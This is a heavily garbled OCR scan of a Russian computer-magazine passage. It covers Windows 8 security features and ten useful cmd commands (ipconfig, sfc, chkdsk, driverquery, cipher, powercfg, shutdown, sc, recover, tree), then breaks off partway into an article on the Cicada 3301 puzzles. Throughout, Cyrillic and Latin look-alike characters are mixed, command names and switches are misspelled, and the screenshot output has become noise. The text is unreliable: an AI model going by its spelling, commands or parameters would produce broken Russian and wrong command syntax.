Пр^рпНрг 1 1итник > \Л/Јпг1п\л/с;»\ и ^панлмд\/гчп \Л/|пг1п\л/с; Мрүрнмчм 1 1ЛП рпрпкир 



по^вившиис^ в висте и сервезно доработанныи к восвмерке, представл^ет собои 
насто^идии подарок дгт лкзбителеи сидетв под администратором. Он ввтвл^ет за- 
пуск программ, требукзидих прав администратора дгт своего запуска, и в^вном виде 
спрашивает об әтом полызовател^ — заказывал ли он такукз «глубокукз» активноств 
(изменени^ в системных папках, перенастроика брандмауәра, редактор реестра 
и прочее)? А что зто вообиде за программа? А кака^ у нее иифрова^ подписв? Вот 
то-то! 

ШШ ӘФФЕКТИВНОЕ ШИФРОВАНИЕ 

\Л/тс!о\л/5 8 (редакии^ РгоТе55Јопа1) с помоидыо технологии ВИ:1_оскег способна зашиф- 
роватв абсолкзтно вскз информаиик) на жестком диске. Дгт удобства, восполызовав- 
шисв ВИ:1_оскег'ом, можно зашифроватв не весв винчестер, а толбко определенныи 
раздел или несколвко. Данна^ технологи^ реализует несколвко способов шифрова- 
ни^, основанных на алгоритме АЕ5-128 и АЕ5-256. Вдобавок\Л/тс!о\л/5 8 Профессио- 
налвна^ может шифроватв информаиикз на внешних носител^х, исполызу^ дл^ әтого 
технологик) ВШ_оскегТо Өо. 

П ЗАШДИиДЕННОЕ ПОДКЛКЗЧЕНИЕ К УДАЛЕННОМУ ДЕСКТОПУ 
Профессионалвна^ верси^ восвмерки исполызует обновленныи протокол дгт заши- 
иденного подклкзчени^ к удаленному рабочему столу. Так что теперв можно подклкз- 
чатыт к домашнему компу из лкзбои открытои сети, не исполызу^ дополнителвныи 
софт и не опаса^св за свои данные. К әтому же пункту относитс^ возможноств под- 
клкзчени^ к внутреннеи сети (при условии наличи^ прав) какои-либо организаиии. 

ДД ОБНОВЛЕННЫИ ИНТЕРФЕИС СОМ 

В \Л/тс!о\л/5 8 исполызуетс^ обновленныи интерфеис приложении СОМ, назван- 
ныи С++/СХ (Соплропеп!: ЕхТепзЈоп — компонентное расширение). Главным обра- 
зом данное расширение исполызуетс^ дл^ работы с подсистемои \Л/тс!о\л/5 ВипИппе 
с помоидыо ^зыка С++. Развитие компонентнои модели (СОМ) позволило избавитв- 
с^ от огромного числа дыр, через которые лезла малварв. Теперв очередв за при- 
кладными программистами — чем болвше приложении будут исполызоватв новые 
программные интерфеисы, тем менвше дыр будет в софте. Кроме того, приложени^ 
в стиле \Л/тс!о\л/5 8 выполн^кзтс^ в своего рода песочнииах, операиионна^ система 
имеет болвшии контролв над их выполнением, при нехватке ресурсов она может 
уничтожитв давно не исполызуемыи проиесс. 

ШХШ ӘФФЕКТИВНЫИ ДИСПЕТЧЕР ЗАДАЧ 

Диспетчер задач в \Л/тс!о\л/5 8 стал по-насто^идему полезным инструментом. Те- 
перв его можно исполызоватв не толвко дл^ закрыти^ программ и уничтожени^ 
проиессов, но и дл^ получени^ динамическои статистики по разным системным 
параметрам. Новыи диспетчер задач имеет два представлени^: минималистиче- 
скии и подробныи. В первом отображакзтс^ толвко запуиденные проиессы, тогда 
как второи представл^ет широкукз информаиикз по системе, разделеннукз на сле- 
дукзидие категории. На вкладке «Проиессы» отображакзтс^ не толвко имена запу- 
иденных программ, но и исполызуема^ каждым из них моидноств проиессора, об^ем 
исполызуемои пам^ти, скороств обмена данными с жестким диском и последнии 



отображаемыи на әтои вкладке параметр — скороств обмена данными с сетыо. 
Каждыи параметр отображаетс^ в проиентном әквиваленте. и,ентралвнукз частв 
вкладки «Производителвноств» занимает диаграмма загруженности иентралвного 
проиессора. Кроме того, на зтои вкладке присутствукзт уменвшенные диаграммы 
исполвзовани^ 1ДП, пам^ти, жестких дисков (если в компыотере установлено не- 
сколвко винчестеров, то дл^ каждого отделвна^ диаграмма). Плкзс к зтому имеетс^ 
диаграмма исполызовани^ сети — данные об ЕШегпеЈ-адаптере. Ниже присутству- 
кзт счетчики, показывакзыдие рассмотреннукз информаиикз втекстовом виде, кроме 
обсужденных показателеи здесв отображакзтс^: количества порожденных прои,ес- 
сов и потоков, дескрипторов, сокетов, проиессорных ^дер, размеры кешеи и дру- 
гое. Вкладка «Журнал приложении» показывает информаи,икз о жизнеде^телвности 
программ: кака^ из них сколвко ресурсов израсходовала. На вкладке «Автозагруз- 
ка» отображакзтс^ приложени^, которые стартукзт вместе с запуском операи,ионнои 
системы. С помоыдыо контекстного менкз их можно удал^тв из автозагрузки. На за- 
кладке «Полвзователи» отображакзтс^ истраченные ресурсы системы относителв- 
но каждого зарегистрированного полызовател^. Более полные сведени^ о каждом 
запушенном проиессе можно увидетв на вкладке «Подробности», также на неи 
можно убитв про1десс. Последн^^ вкладка «Службы» раскрывает информаи,икз о за- 
пушенных системных службах, вклкзчает им^, идентификатор, краткое описание, 
состо^ние (остановлено/выполн^етс^) и группу, к которои относитс^ данна^ служ- 
ба. С помоыдыо главного менкз можно настроитв некоторые параметры самого дис- 
петчера, например скороств обновлени^ данных в окне. 
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Диспетчер задач 



_ п 



©аил Парзметры Вид 



Про^ессы Производителһностһ Журнал приложении | Автозагрузка | Полвзователи | Подробности | Службы | 



2% 2.33 ГГи, 



Памитһ 

1,3/4.0 ГБ (45%) 



Дисҝ 0 (0:) 

0% 



Дисҝ 1 (С:) 
2% 



Е1һете1 



I :ј=1Ј: ■ и Отправлено: 64.0 Приһ 

---- ■■ — ■ 1 



МП 

Исполыуетса % 



1гтЫ(К) Соге(Ш)2 Оио СР11 Е6550 @ 2.33СН- 

100% 




60 секунд 

Исполһзование Скоростһ Максималһнад скоросты 2.33 ГГ14 

2% 2.33 ГГд Соҝетов: 1 

Лдра: 2 

Про^ессы Потоки Дескрипторы Лстических проиессоров: 2 

^2 804 25775 Виртуализаиил: Вклк>чено 

Кзш 1_1: ШКБ 

Времд работы Кзш 4 0 МБ 

0:00:28:46 



(*) Меныие © Открытһ монитор ресурсов 



Диспетчер задач в У\Лпо!о\л/5 8 



ШГШ ОБНОВЛЕННОЕ ВОССТАНОВЛЕНИЕ СИСТЕМЫ 

Теперв ты можешв выполнитв возврат системных фаилов \Л/Јпс1о\л/5 в исходное со- 
сто^ние без потери своих данных и настроек. Болвше не нужно бәкапитв терабаиты 
информаи,ии в случае непредвиденного краха системы! 



ЗАКЛК>ЧЕНИЕ 



В заклкзчение хотелосв бы отметитв фичу, присушукз восвмерке и не относ^шукзс^ 
к безопасности. ^ считакз неверо^тно удобным интерфеис в стиле \Л/Јпс!о\л/5 8, осо- 
бенно при исполвзовании его вместе с сенсорным әкраном. Впервые ^ познакомил- 
с^ с «плиточным» интерфеисом на смартфоне с \ЛЛпс!о\л/5 Рһопе, и он сразу стал дгт 
мен^ незаменимым. Позже мне было при^тно увидетв его в настолынои ОС. Но нирва- 
ны 9\ достиг, когда на настолвном ПК восполвзовалс^ сенсорным дисплеем. Әто новыи 
взггтд на работу с компыотером, пришло понимание, что добавил интерфеис в стиле 
\Л/Јпс!о\л/5 8 дгт настолвнои ОС. Вдобавок МЈсгс>5о1т. периодично выпускает обновлени^ 
дгт интерфеиса, прислушива^св к пожелани^м кззеров. К примеру, в обновление 8.1 
была возврашена кнопка «Пуск». 



Все еше не готов расстатвсл с МшсЈоотз ХР? 

Еиде болвше аргументов — на хакер.ги/доогјһуе-уујпхр 



Раг1у Нке №'з 



И снова о главном — даваи погово- 
рим о хорошо знакомом төбө стсЈ.өхе. 
Даже в новомоднои восвмерке кон- 
солһ никуда не деласв и выполнлет все 
привычные длл тебл задачи. И даже 
таит в себе несколвко скзрпризов. 




Денис 
Колисниченко 

(јһ5Ј1аһ5@дтаЈ1.сот 
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1. КОМАНДА 1РСОЫҒ1С 

Наиболее известна^ и позтому наименее интересна^ в нашем обзоре. Әта коман- 
да знакома всем «командным» администраторам и болвшинству полвзователеи: 
когда возникакзт проблемы с интернетом, сотрудники техподдержки прос^т полв- 
зовател^ ввести именно ее. 

Команда позвол^ет просматриватв ТСР/1Р-информаи,икз и работатв с неи. 
Можно исполвзоватв ее дл^ проверки 1Р-адреса компыотера, освобождени^ или 
обновлени^ аренды назначенного 1Р-адреса и даже дл^ уничтожени^ локалвного 
ОЫЗ-кеша. 

Если просто ввести јрсопТЈд в команднои строке, команда отобразит информа- 
|дикз об 1Р-адресах всех сетевых адаптеров. Дл^ каждого адаптера выводитс^ его 
описание, например «ЕШегпеТ-адаптер» или «Адаптер беспроводнои локалвнои 
сети», чтобы было пон^тно, конфигураии^ какого именно показана. Обычныи на- 
бор информаи,ии содержит 1Р-адрес, маску подсети, основнои шлкзз и еш,е пару 
полеи не оченв полезных сведении. Если требуетс^ получитв болвше данных, 
нужно исполвзоватв параметр /а11. При әтом команда выведет гораздо болвше 
информаи,ии, а самое полезное в расширенном выводе — әто поле «Физическии 
адрес», то еств МАС-адрес адаптера. 

Кроме параметра /а11 команды јрсопЛд, заслуживакзт присталвного внимани^ 
параметры /ге1еазе, /гепе\л/ и /Т1и5һс!п5. Первыи позвол^ет освободитв 1Р-адрес, 
назначенныи по протоколу ОНСР Правда, после әтого сетв откажетс^ работатв, 
так как сетевои интерфеис окажетс^ несконфигурированным, поәтому пригодитс^ 
второи параметр — /гепе\л/, которыи позвол^ет обновитв вскз информаи,икз, назна- 
чаемукз по ОНСР Әтот параметр оченв полезен, посколвку заставл^ет твои комп 
переподклкзчитвс^ к маршрутизатору или к серверам проваидера. Бывает так, 
что при загрузке комп не видит беспроводнукз сетв (такукз проблему п периодиче- 
ски наблкздак) на своем домашнем компе подуправлением\Л/тс1о\л/5 7). Вместо пе- 
резагрузки компа проше ввести јрсопТЈд /гепе\л/, и сетв по^витс^. Третии параметр 
позвол^ет уничтожитв весв локалвныи ОЫЗ-кеш. Иногда уничтожение ОЫЗ-кеша 
позвол^ет решитв некоторые проблемы установки соединени^, например, когда 
ОЫЗ-информаии^ на сервере уже обновлена, но стара^ еш,е осталасв в локалвном 
кеше. 



Администратар: Каманднан страка 



_ п 



С =\Н1т1о1Ј5\34"51:ет32 >1рсопҒ 1д /а11 






Настранка протокола 1Р длн УхлЈоиз 






Имп ҝпмпыптнрл ......... 


: мпи 












- Ги4риднын 




I Р-марырутнзаинл вк/ночеиа .... 


: Нет 




ШЫЕ-проҝсн вклнчен . 


: Нет 




Парндоҝ просмотра сусрфиксоо 0Н5 . 


: 1оса1с1опа1п 




Екһегпет, асГаркег Ет^һегпег. : 








- 1сс А1с1опа1п 




Оп исан не 


: Сетевое подҝлнҹеные 


1п1:е1с[]0 825741 С1даһ 








Физическин адрес 


: 0И-0С-29-8В-Б9-24 




ОНСР вклнчен 


= Да 




Нвтонастро^ҝа вҝлпчена. ..... 


: Да 




Локалһныи 1 Ри Б-а дрес канала . . . 


: Ғе80: :с47Ғ :с|114:а806 


: 51ас>:3<Основнои > 



1Ри4 адрес : 192 . 168 . 52 .138 (Основнси) 

Маска подсети 255 . 255 . 255 .0 

нренда получена =10 апрелд 2Ш14 г. 9:40:42 

Срок аренды истекает : 10 апрелд 2(914 г. 10:10:41 

Оснобнои шлмз = 1?2.168.52.2 

ВНСРсервер : 192.168.52.254 

1Д1Б ОНСҒиб 50334761 

01110 ҝлнента ОНСҒиһ : Ш-О1-1!)О-О1-1н-В5-В1-012-ШО-ШС-29-8В-П9-24 



БЧ5 се рвер ы 

Осиовнон №1НЗ — сервер. 
ЫесВ1оЕ через 1СР/1Р. 



192.168.52.2 
192.168.52.2 
= Бклпчен 



: МЛп(Ј1оиз\5д5т;ет32 > 



Выводкоманды ЈрсопЛд/а11 



2. КОМАНДА 5ҒС 

Команда зТс (зузТет ТИе сһескег) позвол^ет проверитв системнукз фаиловукз си- 
стему. Не стоит путатв әту команду с командои сһкс!5к (сһеск сПзк). С помоидыо 
последнеи можно исправитв фаиловукз систему на более низком уровне и даже 
пометитв оас!-секторы. А вот команда зТс пригодитс^, если вдруг какои-то си- 
стемныи фаил \Л/тс!о\л/5 поврежден. Она может обнаружитв әто и заменитв битыи 
фаил без вс^кого вмешателвства со стороны полвзовател^. Оченв и оченв полез- 
на^ команда. Она сравнивает тыс^чи базовых\Л/тс!о\л/5-фаилов с оригиналвными 
верси^ми, которые поставл^лисв с \Л/тс!о\л/5, и при необходимости замен^ет по- 
врежденные или отсутствукзидие фаилы с помоидыо \ЛЛпс!о\л/5 11рс!а1:е. В зависимо- 
сти оттого, как установлена \Л/Јпс!о\л/5, может понадобитвс^, а может и не понадо- 
битвс^ инсталл^иионныи носителв. Обычно он не нужен. 
Можно выделитв следукзидие полезные параметры зТс: 

• /5саппо\л/ — осуидествл^ет немедленнукз проверку системы и при необходимо- 
сти замен^ет фаилы. После выполнени^ зТс нужно перезагрузитһ\ЛЛпс!о\л/5, если 
были наидены проблемы; 

• /5сапопсе — проверка будет произведена при следукзидем перезапуске систе- 
мы; 

• /зсапһооТ — проверка будет идти при каждом перезапуске системы. Отменитв 
позвол^ет параметр РеуегТ: после того, как поәкспериментировал с параме- 
тром /зсапоооТ, нужно выполнитв команду 5Тс ВеуегТ, иначе проверка будет осу- 
идествл^твс^ при каждом перезапуске. 



Администратор: Ксманднап строка 



11сх*05оҒ1; 1Ј1пЛоио [Уеғзп-оп 6.3.9600] 

Сс> Корпораиил Маикросорт <!М1сгобо:Ғт; Согрогас 10г 2013. Бсе права зашлшены. 
С: \Н1пДоиз\зузСеп32 >зҒс /зсаппои 

Чачато сҝанирование снстемы. Әтот проиесс может занит^ неҝоторое времл. 
Начало стадин проверкн при сканировании снстемы. 

Ировврка 100:1 заверыена. 

Програмпа зашиты ресурсов ЧЛпЛомг о^нар ужнла поврекденные (^анлы, но не 

может восстановит^ некоторые из них. Подросные сведеннн см. в ч>анле СЕЕ.Һоу, ҝот 

□ рын находитсп по следукниему путн : мхпсИгМјОсг&ЧСВЕЧСЕЕ . 1с у . Напрнмер, 

С = \1Ј1пс10М5\1јо*г5\СВ5\СВ5 . 1оч . Обратнте впнмание, что веденне журн-ала 

в настопидее времп не поддержнваетса длд автономного оесл униваннд . 

С: \1Ј1пЛоиЕ\5уз^еп32 >_ 




Резулыат выполненил 5к/зсаппо\л/ 



3. КОМАНДА СНКОЗК 

Команда сһксЈзк (Сһеск ОЈзк) позвол^ет починитв ошибки фаиловои системы, об- 
наружитв оас!-секторы, восстановитв читаемукз информаи,икз из оас!-секторов. 
\Л/Јпс!о\л/5 провер^ет диски автоматически, однако сһкс!зк можно запуститв и вруч- 
нукз, если еств подозрени^, что с диском что-то не так. 

В качестве параметров команде нужно передатв им^ тома или им^ фаила (если 
требуетс^ проверитв один фаил или группу фаилов, в әтом случае нужно передатв 
маску фаила). Параметр /Ғ автоматически исправл^ет ошибки, параметр /В по- 
звол^ет обнаружитв оас!-секторы и восстановитв информаиикз с них. Если сһкс!зк 
не может получитв исклкзчителвныи доступ к диску, тогда проверка диска будет 
произведена при следукзидеи загрузке системы. Әто обычное ^вление при попыт- 
ке проверитв диск С:. Пример: сһкс!зк 0: /Н. 



Администратор: Команднал строка - сһЫ&к С: /Р 



_ □ 



хсгонотк ншааыз Шегкхоп б.З.т&ОСП 
Сс> Корпораинл Ианкросо^т £ГИсгозо£Ч; Согрога* !оп>^ 21013. Все права заишиены, 

= МЛпс1ои5Ч5Ј1г1:еп32>сһ}!Л511 С = /В 
Тнп Ф&иловои снстемы: ЫТҒ5. 
Ие удаетсл за^лоҝираватһ төҝуидом дисҝ . 

Невозможно выпалнитһ команду т-ак кан и.ка-заннын том нспо л^з уетсн 

■ругнм проиессом. Следует лн выполннт^ проверҝу зтого тома прн 
Еледуишеи перезагрузке снстемы? [¥ <Сда}/Ы(нет} ] _ 



Отложенныи запуск сһксјзк 

4. КОМАНДА ОШУЕК01ЈЕПҮ 

Команда генерирует список всех драиверов, установленных 
в \Л/Јпс!о\л/5. Хорошии инструмент, позвол^кзидии создаватв 
отчеты. Команду можно исполвзоватв дгт исследовани^ но- 
меров версии установленных драиверов. На основе ее ре- 
зулвтатов можно определитв, нужно ли обновл^тв тот или 
инои драивер. 

Самые полезные параметры зтои команды — /з, /з'\ и /То. 
Первыи параметр позвол^ет указатв им^ или 1Р-адрес уда- 
ленного узла, драиверы которого нужно исследоватв. Вто- 




0 команде роууегсТа 

Справочноеруковод- 
ство по команднои стро- 
ке отМЈсгозоН 



рои параметр показывает иифровукз подписв драиверов. 
Третии позвол^ет указатв формат отчета: /То ТАВ1_Е — табли- 
|да (по умолчанико), До 1Ј5Т — список, До С5\/ — С5\/-формат, 
которыи удобно будет просматриватв в Ехсе1 или подобнои 
программе. 
Пример: 



Обуправлении служба- 
ми и командезс 

Подробноо команде 
зс сопТЈд 



(Јгјуегдиегу /-Ғо С5У > с!гЈуег5.С5У 



Администратор: Кошнднан орока 



СР1 

ср±ех 

еЈЈ^Ј^ад^^ 

с»1£1»в 

]>?ЖАХ 

Р0 

ур440 
һсасһе 

I и1,1'П'.' 

шШВ 

(ЧЛРРМ 

тДзлСа 

тАха^а 

гсзаз 

аз1с01вр1а1Ј 
- Далее — 



Название 

1394 0НС1-совиестипыи 

Дрвнвер НхсгозоҒе нСР1 
ШсгоаоЈЕ кСРШх 0г1ие 
Праиеер агрегагора про 
Дрдивер устрон^ства нзм 
Драииср ПСР1 УлКс Н1«1- 
Н0Р80НК 

ДрсиЗвср ДОПОЛПНТСЛБННХ 

1п£е1 - Филһтр шнны нС 

Прр11СЛб!ОП Сотра* јһт1 

АНИ - др^ивер Фнлыра 

НМБ К8 драивер проиесс 

Драивер ПРоиессОра. нНП 

атДзаЕа 

атЛзһз 

атЛха£а 

Дрзивер Нрр1Р 

нааокес 5нБ/5к1н-П Нн 

Канал 1ИЕ 

Вае1сБ1зр1ау 



Ти1 дранвера Дата ссылҝн 



22 .§8 . 
12.Ө4. 
08-10- 
22. ОБ. 
22.08. 
22.08. 
?:?. .03. 
13.07. 
22 .03 . 
22 .Ө8 . 
22.09. 
22 .(.18. 
22. 0В. 
22.08. 
09 .07. 
12.12. 
09 .07. 

09.07. 
22. ОВ. 
22.08. 



8:09:42 

2:49:38 

10:43:23 

8 :Ө9 :20 

8:10:21 

8:10:24 

8:10:28 

1:47:26 

8:08:21 

8:11:13 

8:11:29 

8:11:14 

5:58:53 

5:58:53 

2:54:56 

1:23:20 

2:50:30 

14=43=12 

4:51:58 

8:12:19 

8:11:04 




В А Ш Ф 



Команда о!пүег^иегу I тоге 



5. КОМАНДА С1РНЕН 

Данна^ команда исполызуетс^ дгт работы с зашифрованными папками и фаилами 
на 1\1ТҒ5-томах. Обычно с такими папками и фаилами работакзт через графическии 
интерфеис (что значителвно удобнее), но у команды сјрһег еств оченв полезныи па- 
раметр 



сјрһег /1л1:путв 



Параметр /\Л/ (например, /\Л/:С:) удагтет данные на неисполызуемых част^х тома 
и әффективно стирает данные нажестком диске после ихудалени^. Другими слова- 
ми, зту команду можно исполызоватв дгт физического удалени^ данных с диска — 
так, чтобы их нелыз^ было восстановитв спеи,иалвными утилитами. Нужно отметитв, 
что поимен^етс^ она толвко к обычным жестким дискам. но не к 550-дискам. Счи- 



таетс^, что с 550 фаилы удал^кзтс^ немедленно и без возможности восстановле- 
ни^. Хот^ заинтересованным читател^м ^ бы порекомендовал прочитатв вот зто: 

һаогаһаог.ги/розТ/Ј 15349/ . 

Администратор: Команднаа строҝа - сјрһег ДҮ:С: ~ п I 



С:Ч>схрһег /1Ј:С: 
Чтобы лучше очиститһ том 
при выполнении С1РНЕК /1Ј 
Записв 0x00 



и затеретһ максималвно возможное количество данных, 
рекомендуетсн закрытв все другие приложенин. 





Команда сЈрһег/У\/:С: 



6. КОМАНДА РООТЕПСҒС 

Команда ро\л/егсТд управл^ет параметрами злектропитани^. У нее оченв много пара- 
метров, и если деиствителвно нужно управл^тв злектропитанием из сети, то лучше 
восполвзоватвс^ параметром /? дгт получени^ справки обо всех. Но болвшинству 
полвзователеи будут интересны параметры /а и /оаТТегугерогТ. Перва^ команда вы- 
водит список драиверов, которые не позвол^кгг системе «уснутв», а втора^ выводит 
отчет об исполвзовании батареи. 

7. КОМАНДА ЗН1ЈТОООТЫ 

В 1ЛЧ1Х дгт завершени^ работы системы (выклкзчени^, перезагрузки) исполвзуетс^ 
команда 5һиТс!о\л/п. Мало кто знает, но одноименна^ команда еств и в \Л/Јпс1о\л/5. Те- 
перв фанаты 11Ы1Х могут завершатв работу системы командои 5һиТс!о\л/п -з и переза- 
гружатв систему командои 5һиТс1о\л/п -г. Также доступен параметр -Т, позвол^кзидии 
задатв таимер завершени^ работы (в секундах), например, в следукзидем примере 
система будет перезагружена через одну минуту: 5һиТс!о\л/п -г -Т 60. Параметр -Т обе- 
спечивает принудителвное завершение работы с закрытием всех запуиденных при- 
ложении. 



РОШЕРЗНЕИ 




В 2012 году «Хакер» публиковал статыо «Апгреиды дгт стсЈ.ехе и алвтернативы», 



в которои оосуждалисв возможные замены дл^ спла.ехе. Напомнкз, что в ста- 
тыз рассматривалисв сопзо1е, сИпк, Суд\ллп, пгпгШу, Ро\л/егСтс1. Все они позвол^- 
кл" сделатв работу в команднои строке әффективнее. В МЈсгозог! тоже понимали, 
что стандартныи стс!.ехе уже безнадежно устарел, и вместо того, чтобы подвер- 
гнутв его апгреиду, в МЈсгозоТ! работали над Ро\л/ег5һе11. Ро\л/ег5һе11 — расшир^е- 
мое средство автоматизаи,ии от МЈсгозоТТ, состо^идее из оболочки с интерфеисом 
команднои строки и сопутствукзидего ^зыка сиенариев. Будуидее команднои строки 
\/\/Јпс1о\л/5 за Ро\л/ег5һе11, поәтому, если ты еиде не знаком с ним, самое врем^ начатв 
знакомство. О Ро\л/ег5һе11 мы писали в февралвском номере. 



8. КОМАНДА ЗС 

Команда 5С взаимодеиствует с контроллером служб и установленными службами. 
В 1)Ы1Х/ипих можно управл^тв службами (сервисами, демонами) из команднои стро- 
ки (в прин1дипе, не знакз такои веиди, которукз нелвз^ было бы выполнитв из команд- 
нои строки в 111Ч1Х). С помоидыо утилиты зс можно управл^тв службами из команднои 
строки в \Л/Јпс1о\л/5. Можно запускатв и останавливатв службы, измен^тв тип запуска 
службы и так далее. 

Так, дгт запуска и останова службы исполызукггс^ соответственно параметры 
зТагТ и 5Тор: 

5С Б^аг!: <имл службы> 
5С 51:ор <имл с лужбы> 

Назревает вопрос: какузнатв им^ службы? Оченв просто — дгт әтого нужно исполызо- 
ватв параметр диегу, в резулвтате будет отображен деталвныи переченв всех служб: 

5С диегу 

Так как список оченв болвшои, дгт его просмотра можно перенаправитв вывод ко- 
манды или в команду плоге (дгт пагинаиии), или в буфер обмена (команда сИр), или 
в фаил: 

5С диегу | тоге 
5с^иегу | сИр 
5С диегу > 5 егујсе5 .1:х1: 

Дополнителвнукз информаиикз об зтои команде можно наити на врезке. 
~з Администратор: Команднаа строка 




Имн_сл ужбы: Ае^оокирСмс 

Выводнмое_имн : Информаинн о совместимости приложении 
Тип : 2Ш 1ПМ32_5НАНЕ_РВОСЕ55 

Состонние : 4 ШЈНМЫС 

<5Т0РРнВЕЕ, Ы0Т_Рни5нВЕЕ, 1СН0ВЕ5_5Н1ЈТБ0иһО 
Код_выхода_1Лп32 : Ш <ШхШ> 



Контролһнан_точка : 0x0 
Ожидание : 0x0 



Имн_сл ужбы: АррхпҒо 

Выводимое_имн : Сведенин о приложении 
Тип : 20 

Состонние : 4 



Ко д_в ыхо да_1Ј хп 3 2 
Ко д_в ыхо да_с л ажб ы 
Контролһнан_точка 
Ожидание 



0 
0 

0x0 
0x0 



1Ј I N3 2 _5 Н н ПЕ_РП0СЕ5 5 
К1)МЫ1ЫС 
<5Т0РРнВЕЕ, Ы0Т_Рни5нВЕЕ, 

<0х0> 
<0х0> 



1СН0ПЕ5_5Ни"ТБ0иН> 



Имн_сл ужбы: нррМдтЈ; 

Выводимое_имн : Управление приложенинми 

Тип : 20 и1Ы32_5НнНЕ_РВОСЕ55 
— Далее — . 



Команда зс ^иегу I тоге 

9. КОМАНДА НЕСОУЕН 

Исполвзуетс^ дгт восстановлени^ информаи,ии с испорченного или дефектного 
диска. Представим, что у нас еств каталог с!:\герогт5\2014 и в нем был фаил јап.тхт, 
но на диске по^вилисв оас!-секторы, и прочитатв фаил јап.тхт не получаетс^. Дгт вос- 
становлени^ (частичного) информаи,ии из зтого фаила можно исполвзоватв команду 

гесоуег с:\герогс5\2Ө14\јап.1:х1: 

Команда гесоуег читает фаил сектор за сектором и восстанавливает информаи,икз, 
которукз еиде можно прочитатв. Пон^тно, что программа не сможет вз^тв информа- 
|дикз из поврежденных секторов, поәтому восстановление информаи,ии будет частич- 
ным. Данные из поврежденных секторов будут утер^ны. 

Также нужно помнитв, что исполызование масок фаилов вроде * и ? в әтои коман- 
де не допускаетс^, нужно указатв ^вное им^ фаила. 

10. КОМАНДА ТКЕЕ 

Кому-то команда тгее покажетс^ бесполезнои, однако она пригодитс^ разработчи- 
кам программного обеспечени^ и техническим писател^м. Команда тгее отобража- 
ет структуру каталогов по указанному пути. Например, у нас еств проект с:\ту_ргј\ 
ргојест1 . Нужно построитв структуру подкаталогов әтого каталога. Дгт әтого можно 
исполвзоватв следукзидие команды: 

1:гее с : \шу_ргј\ргојес1:Ј_|^Нр 

£гее с : \ту_ргј\ргојес1: 1 > ргојесЫ.ЈхЈ: 

Перва^ команда копирует структуру каталогов в буфер обмена, а втора^ помеидает 
в фаил с именем ргојест1 .тхт. _С 




С : Чту_рг јЧрго јес1;1Ча(1тхп >£гее с : Чту_ргјЧрго јес£1 
Структура папок 

Серииныи номер тома: ООЕ99Ғ90 С813:В9н1 
С : \М¥_РНЈ\РР.0ЈЕСТ1 
ас1тхп 

сопҒ хд 

Да*:а 

' "1 П Г: 1 1 1 Н 51 



һаскир 

сопҒ хсу 

аа£а 

һеааег 

' 1пс 1иаез 

С : Чту_рг јЧрго јес1;1Чааг1хп > 



Команда 1тее 



САМАЛ ИНТЕРЕСНАЛ И МАССОВАЧ 
КРИПТОИГРАВСЕТИ 



Таинствөнна^ хакерскад группа, именуһош^ сөб^ 
СЈсасЈа 3301 , каждыи год проводит сост^зани^ срөди 
лкзбителеи криптографии. Никто нөзнаөт, чтождөт 
побөдитөлөи, но тыс^чи лкздеи охотно вклкзчакзтс^ 
в әто дөиство, похожөө на изош,реннукз игру. 




Андреи Писвменныи 

арЈ5теппу@атаЈ1.сот 




елые буквы на черном фоне гласили: «Мы иидем оченв умных лкздеи. Чтобы 
наити их, мы разработали тест. В зтои картинке спр^тано сообидение. Наиди 
его, и оно укажет дорогу, ведуидукз к нам. Мы будем рады встретитв тех не- 
многих, что доидутдо кон1да. Удачи!» В кони,е подписв: «3301». 



Оригинал зтого сообидени^ по^вилс^ в ^нваре 2012 года на анонимном форуме 
4сһап и сумел привлечв к себе болвшое внимание. Как и задумывали его неведо- 
мые авторы, по следу немедгт пустилисв те самые умные лкзди. Кто-то из них до- 
шел до |дели и, предположителвно, присоединилс^ к группе, именуемои СЈсас!а 3301 . 
Но что зто за группа и чем она занимаетс^, пока что остаетс^ таинои. Все, что мы 
знаем, — зто рассказы тех, кто сбилс^ с пути и не прошел задание до кони,а. 

Джозлв Әрикссон, 34-летнии аналитик из Швеиии, рассказал британскому изда- 
никз Тһе Те1едгарһ о своих изыскани^х, начавшихс^ с того, что к нему в руки попа- 
ло сообидение «1Дикады». Он быстро обнаружил, что в картинке были застеганогра- 
фированы две строки, а клкзчом оказалисв |дифры 3301. Одна из строк — «Тиберии 
Клавдии 1Дезарв», втора^ — случаиныи набор символов. 

Упоминание Тибери^ Клавди^ 1Дезар^ — намек на шифр 1Дезар^, один из стареи- 
ших и простеиших методов шифровани^. Каждои букве в алфавите присваиваетс^ 
номер, затем номера сдвигакггс^ на определенное число позии,ии и текст записы- 
ваетс^ с учетом сдвига. Древние римл^не могли полызоватыз^ столв простои техни- 
кои лишв потому, что никто не догадывалс^ о возможности расшифровки послани^. 
Әрикссон же быстро подобрал нужное число (четыре) и обнаружил, что в строке была 
зашифрована гиперссылка. 



шашсша15. 1о һпа тет, \л/е һауе аеу|5еа 
а 1е51. 

Тһеге 15 а те^заде һ ЈсЈсЈеп ш 1һм5 јтаде. 

Ғтс! 1Ј, апсЈ ИмлН 1еас1 уои оп !һе гоас! 1о 
[шсһпд 115. УУе 1оок Јор^агсЈ 1о тее!шд 1һе 
1е\у *һа! у/ј|| таке \\ а11 !һе ү/ау ^һгои-дһ. 

СоосЈ I иск. 

3301 



По ссылке нашласв картинка с изображением утки и надписыо «Упс! Әто все- 
го лишв приманка. Кажетс^, ты знаешв, как получитв послание». На әтот раз клкзча 
не было, и пришлосв восполвзоватвс^ дешифровочнои программои ОиЈӨиезз. С ее 
помоидыо из картинки выловиласв ссылка на подраздел форума Нес1сИ1, где каждые 
два часа по^вл^ласв нова^ строка книги, сопровождаема^ загадочными символами 
из точек и палочек. Әрикссон снова оказалс^ на высоте: на текст он решил не обра- 
шатв внимани^, а вот в точках и палочках распознал и,ифры маи^. 



Умилвнал уточка 
дает очереднук) 
подсказку 



С әтого момента сложноств загадок выросла на пор^док, а еиде стали то и дело 
попадатыз^ изображени^ и,икад. Әто не случаиныи выбор дгт логотипа группы: неко- 
торые виды _дикад вылупл^кзтс^ толвко раз в 13 или 17 лет, чтобы избежатв синхрони- 
заи,ии жизненного _дикла с питакзидимис^ ими хиидниками. 13 и 17 — простые числа, 
а простые числа, как известно, игракзт важнеишукз ролв в криптографии. 

Разнообразие загадоктоже росло. Шифры стали чередоватвс^ с тестами на зна- 
ние истории, философии, литературы и музыки. Идуидим по следу әнтузиастам при- 
шлосв столкнутвс^ с иитатами из древнего валлииского произведени^ и с отсылками 
к викторианскому оккулвтизму, а также про^витв знание классическои музыки. Одна 
из загадок ссылаласв на известное стихотворение Уилызма Гибсона «Агриппа», про- 
славившеес^ тем, что оно распростран^лосв на дискетах в виде программы, котора^ 
